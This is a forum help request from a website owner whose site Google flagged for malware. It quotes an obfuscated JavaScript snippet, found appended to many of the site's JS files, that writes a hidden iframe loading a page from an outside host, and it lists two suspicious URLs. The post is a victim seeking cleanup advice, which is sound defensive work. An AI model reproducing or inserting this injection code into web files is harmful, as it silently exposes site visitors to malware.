Hi guys my website just been hacked google showing the red (Warning: Something's Not Right Here! www.xxxxxxxx.com contains malware. Your computer might catch a virus if you visit this site.) stating the site has trying to access these two sites http://bentley.poststreetdental.com/...f48be84d67654d http://mazda.georgewkohn.com/direct....f48be84d67654d Now found alot of my js files to have this code at the bottom when i remove it minimise the amount of error on chrome console inspector element, does anyone know if someone actually opened logged in to my FTP accessed the js files and paste those code into it. or if it is some sort of a program that does wrote that. Code: var _0x965b=["\x3C\x64\x69\x76\x20\x6E\x61\x6D\x65\x3D\x22\x79\x6F\x75\x74\x75\x62\x65\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x64\x69\x73\x70\x6C\x61\x79\x3A\x6E\x6F\x6E\x65\x22\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x77\x69\x64\x74\x68\x3D\x22\x35\x36\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x33\x31\x35\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x6D\x61\x7A\x64\x61\x2E\x67\x65\x6F\x72\x67\x65\x77\x6B\x6F\x68\x6E\x2E\x63\x6F\x6D\x2F\x64\x69\x72\x65\x63\x74\x2E\x70\x68\x70\x3F\x70\x61\x67\x65\x3D\x31\x35\x66\x34\x38\x62\x65\x38\x34\x64\x36\x37\x36\x35\x34\x64\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x61\x6C\x6C\x6F\x77\x66\x75\x6C\x6C\x73\x63\x72\x65\x65\x6E\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x77\x72\x69\x74\x65"];document[_0x965b[1]](_0x965b[0]); Code (markup): At momment i am trying going to every single file and delete that line of code, but I am not sure if it might be something else or if somone has a way of accessing my FTP i've changed the password. Any sugestion? Do I just delete the code on JS files? or should I look for something else on the server?